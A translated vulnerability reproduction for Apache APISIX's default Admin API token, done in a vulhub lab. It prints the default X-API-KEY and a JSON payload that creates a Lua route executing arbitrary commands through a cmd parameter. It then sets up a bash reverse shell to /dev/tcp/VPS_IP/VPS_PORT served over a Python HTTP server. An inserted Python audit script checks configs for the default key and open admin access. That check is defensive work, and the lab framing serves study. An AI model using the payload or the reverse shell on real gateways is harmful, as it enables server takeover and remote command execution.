Disclaimer: This article is for learning and reference only. All resources involved come from the Internet. Do not use them for any illegal activity; otherwise you bear the consequences yourself, and I assume no legal or joint liability.
Vulnerability description
Apache APISIX is a dynamic, real-time, high-performance API gateway built on the Nginx network library and etcd. It provides load balancing, dynamic upstreams, canary (grayscale) releases, circuit breaking, authentication, observability and other traffic-management features. When a user enables the Admin API but neither configures an IP access policy for it nor changes the token in the configuration file, an attacker can use the default Apache APISIX token to access the Admin API and thereby take control of the APISIX gateway.
Affected version
Apache APISIX 1.2
Apache APISIX 1.3
Apache APISIX 1.4
Apache APISIX 1.5
Vulnerability reproduction
The vulnerable environment is built with vulhub as before, so I won't repeat that here.
Visit http://192.168.10.171:9080/apisix/admin/routes; the response indicates that /apisix/admin/routes is enabled.
Capture the request and make the following modifications:
1. Change the request method to POST
2. Add the request header X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
3. Add the following request body as the payload
{
    "uri": "/attack",
    "script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "example.com:80": 1
        }
    }
}
Then access the route you just added; any command can be executed through the cmd query parameter.
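As an added defensive check that is not part of the original write-up, the following Python audit flags the two preconditions described in the vulnerability description (an Admin API key left at the default value and a missing or wide-open allow_admin list) and lists routes that carry inline Lua in a script field, like the route created above. It assumes the apisix section of a 1.x config.yaml already loaded into a dict (admin_key entries with name/key/role, allow_admin as a list of CIDRs) and the node/nodes shape of the Admin API's GET /apisix/admin/routes response; the sample inputs are constructed.

```python
import ipaddress
import json

# Default Admin API key shipped in APISIX's config.yaml (the value used in the write-up above).
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"


def audit_admin_config(cfg):
    """Check the `apisix` section of config.yaml (assumed already loaded into a dict)."""
    findings = []
    apisix = cfg.get("apisix", {})
    for entry in apisix.get("admin_key", []):
        if entry.get("key") == DEFAULT_ADMIN_KEY:
            findings.append(f"admin_key '{entry.get('name')}' still uses the default key")
    allow = apisix.get("allow_admin") or []
    if not allow:
        findings.append("allow_admin is empty: Admin API accepts requests from any source IP")
    for cidr in allow:
        # A /0 prefix (e.g. 0.0.0.0/0) is an allowlist in name only.
        if ipaddress.ip_network(cidr, strict=False).prefixlen == 0:
            findings.append(f"allow_admin entry {cidr} permits every address")
    return findings


def audit_routes(routes_json):
    """Flag routes from GET /apisix/admin/routes whose `script` field carries inline Lua."""
    findings = []
    data = json.loads(routes_json)
    for node in data.get("node", {}).get("nodes", []):  # assumed 1.x response shape
        value = node.get("value", {})
        if "script" in value:
            findings.append(f"route {value.get('uri')} carries an inline Lua script")
    return findings


# Constructed sample inputs: a config left at defaults and a route list with one scripted route.
SAMPLE_CONFIG = {
    "apisix": {
        "allow_admin": ["0.0.0.0/0"],
        "admin_key": [{"name": "admin", "key": DEFAULT_ADMIN_KEY, "role": "admin"}],
    }
}
SAMPLE_ROUTES = json.dumps({"node": {"nodes": [
    {"key": "/apisix/routes/1", "value": {"uri": "/attack", "script": "local _M = {} return _M"}},
    {"key": "/apisix/routes/2", "value": {"uri": "/api", "upstream": {"type": "roundrobin"}}},
]}})

if __name__ == "__main__":
    for finding in audit_admin_config(SAMPLE_CONFIG) + audit_routes(SAMPLE_ROUTES):
        print("FINDING:", finding)
```

Rotating the key and restricting allow_admin to the management network removes the first two findings; a route with an unexpected script field is worth reviewing regardless.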
Next, let's demonstrate a reverse connection from this server on the intranet to the VPS.
First, on the VPS, write a reverse shell script containing bash -i >& /dev/tcp/VPS_IP/VPS_PORT 0>&1, then start an HTTP service with Python: python3 -m http.server
Download the test.sh script file.
Next, execute the test.sh script file.
View the reverse shell result on the VPS.